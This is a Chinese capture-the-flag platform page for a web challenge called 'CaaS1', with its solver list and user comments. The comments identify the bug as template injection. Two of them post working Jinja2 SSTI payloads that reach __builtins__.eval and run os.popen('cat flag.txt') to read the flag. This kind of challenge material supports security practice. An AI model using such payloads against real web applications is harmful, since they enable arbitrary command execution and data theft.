CaaS1WEB 未解决
分数:
40
金币:
4
题目作者:
Aman
一 血:
Paradiso
一血奖励:
4金币
解 决:
132
提 示:
描 述:
CaaS1
其 他:
server.zip
评分(1)
解题动态
liqs 攻破了该题 12天前
sjjf 攻破了该题 29天前
WindZQ 攻破了该题 1月前
南京交通第一深情徐立超 攻破了该题 1月前
seyana 攻破了该题 1月前
SkyAsh 攻破了该题 1月前
nihaolmb 攻破了该题 1月前
pigpigG6768 攻破了该题 1月前
20230302203 攻破了该题 2月前
刘德龙 攻破了该题 2月前
叶子璐 攻破了该题 2月前
农群丹 攻破了该题 2月前
杨荣涛 攻破了该题 2月前
05su 攻破了该题 2月前
xz6666 攻破了该题 2月前
螺蛳粉 攻破了该题 2月前
金典 攻破了该题 2月前
特仑苏 攻破了该题 2月前
韦东妙 攻破了该题 2月前
评论
李逍遥逛霍格沃茨 28天前
举报
又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误
李逍遥逛霍格沃茨 28天前
举报
又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误
124要留就要77 8月前
举报
name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag
baozongwi 1年前
举报
会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事
网络小钦 1年前
举报
看不懂啊
2552758573 2年前
举报
payload太长了,绕不过去
无法释怀的遗憾en 2年前
举报
这个题什么意思
无法释怀的遗憾en 1年前
举报
@cgxx 懂了 好玩这个题
cgxx 2年前
举报
模板注入